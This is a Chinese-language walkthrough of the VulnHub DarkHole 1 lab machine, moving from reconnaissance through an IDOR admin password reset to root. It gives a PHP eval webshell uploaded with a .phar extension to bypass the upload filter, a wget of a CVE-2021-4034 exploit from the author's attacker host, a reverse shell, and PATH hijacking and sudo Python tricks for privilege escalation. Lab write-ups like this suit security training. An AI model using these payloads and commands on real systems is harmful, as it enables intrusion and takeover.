vulnhub靶场——DarkHole 1

准备

攻击机: kali,win11

靶机: DARKHOLE: 1 NAT 192.168.91.0 网段

下载链接:

https://www.vulnhub.com/entry/darkhole-1,724/

信息搜集与利用

主机发现

python3 ping.py -H 192.168.91.0/24

如图所示得到目标靶机IP地址: 192.168.91.190

端口扫描

nmap -sV -p- -A -T4 192.168.91.190 –oN darkhole1_nmap.txt

如图所示只开放了 22,80两个端口

目录扫描

扫描80端口
python3 dirsearch.py -u http://192.168.91.190/

如图所示扫描出了一些内容，挨个查看。

HTTP

http://192.168.91.190/

http://192.168.91.190/config/

config目录下有 database.php, 不可见

http://192.168.91.190/config/database.php

http://192.168.91.190/dashboard.php

dashboard.php 显示 Not Allowed To access, 那么肯定要登陆过后才能查看

http://192.168.91.190/upload/

upload 目录下有一张图片

http://192.168.91.190/upload/d.jpg

图中女孩是(看来作者对对其情有独钟！有空去看一下她的电影)

http://192.168.91.190/register.php

注册用户页面

http://192.168.91.190/login.php

登陆页面

尝试弱口令登陆失败，去注册一个用户名: gakki:yyds_gakki

逻辑漏洞

此时发现url 地址 id=2，咱么大胆猜测一下管理员账户的 id=1，那么我们尝试抓包越权修改管理员密码。

如图所示: Password Has been Updated, 现在尝试 admin:123456 登陆

如图所示：admin登陆成功，同时出现新的功能: Upload。

getshell

尝试上传一句话木马:

1	<?php eval($_POST[lbwnb]);?>

如图所示：很明显的可以看到只能上传后缀为：jpg,png,gif 三种图片格式，想办法绕过。

最后发现直接将后缀改为 phar : yjh.phar 就能上传，然后蚁剑连接.

现在拿到一个 www-data 的 shell

cat /etc/passwd | grep “/bin/bash”

如图所示共三个用户具有 /bin/bash, root, darkhole, john

提权

进入 john 的家目录发现第一个 flag : user.txt 很明晰是不能查看的，同时发现 toto 文件具有 SUID 权限，因此我们可以尝试 SUDI 提权。

方法一

同时索索一下是否有其他具有 SUID 的权限的命令或文件
find / -perm -u=s -type f 2>/dev/null

哈哈哈哈，在这里也可以看到 toto ，同时还有一个非常眼熟的东西:

/usr/lib/policykit-1/polkit-agent-helper-1
CVE-2021-4034

这个漏洞存在了十多年，于 2022年 1 月 25 日才曝光出来，编写这篇 wp 的日期为: 2022年 2 月 17 日，同时这个靶机创建于 2021年 7 月 18 日，那么从时间节点来说这个漏洞能利用。当时这个漏洞没有曝光，所以在当时这个是没有危害的

exp链接:

https://github.com/berdav/CVE-2021-4034

将其clone 到 kali 中，在kali中 make 编译完成并打包，然后下载到靶机中，先在kali中编译是为了避免靶机中没有 make 命令。前段时间遇到过这个漏洞，可以参考我以前的文章(csdn,github 两个平台):

https://blog.csdn.net/Czheisenberg/article/details/122969392

https://www.ohhhhhh.top/2022/02/16/vulnhub靶场——CORROSION-2/

https://blog.csdn.net/Czheisenberg/article/details/122897376

https://www.ohhhhhh.top/2022/02/09/vulnhub靶场——THE-PLANETS-MERCURY/

在这里我直接使用它。

wget http://172.22.149.145:8000/CVE-2021-4034.zip

如图所示下载完成，现在 unzip 解压，然后进入目录，执行 ./cve-2021-4034 即可。

出意外了，运行没有反应，啪啪打脸来得太快。

测试发现为什么不行？因为蚁剑的模拟终端的问题，解决办法只需要重新上传一个后缀为 phar的马然后反弹的shell 即可执行 ./cve-2021-4034

这个shell 网上可以下载直接使用，节约时间。

如图所示浏览器点击即可，当然别忘了在 kali 中开启监听哦

如图所示：在得到的新的 shell 中成功运行了exp 得到了 root 权限, 由此可见这个漏洞有可能在一些机器中存在，毕竟今年才出现。

既然我们直接从 www-data 跳到了 root，所以直接查看两个 flag

flag 1

flag 2

方法二

不利用上面的漏洞，那个漏洞是非预期解。现在来看 john 用户目录下的 toto 文件,利用 toto SUID 提权！

如图所示：执行 ./toto 后 uid=1001(john) 但 gid,groups 没变。password 依然不能查看。

查看了一下网上的做法用环境变量提权，这是我不知道的方法

echo '/bin/bash' > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

如图所示：这样就能提权，我很懵逼。

参考链接：

https://xz.aliyun.com/t/2767

现在查看 john 的密码 password

我的天啦，这么简单的密码，还不如直接 ssh 爆破呢。

ssh 登陆

在这里我们就不看 flag 了，直接提权

sudo -l 查看当前用户可运行的文件或命令

如图所示：显示出了 john 家目录下的 file.py ，那我们看一下file.py 有什么

如图所示：发现 file.py 是空的。

既然这样，我们自己写内容然后通过它拿到 root 权限:

1	echo "import os;os.system('/bin/bash')" > file.py

然后运行即可:

如图所示直接运行不允许。那么我们把路径加上

sudo python3 /home/john/file.py

如图所示：成功拿到 root 权限。

总结

CVE-2021-4034 影响很深。
初识环境变量提权。
文件上传 getshell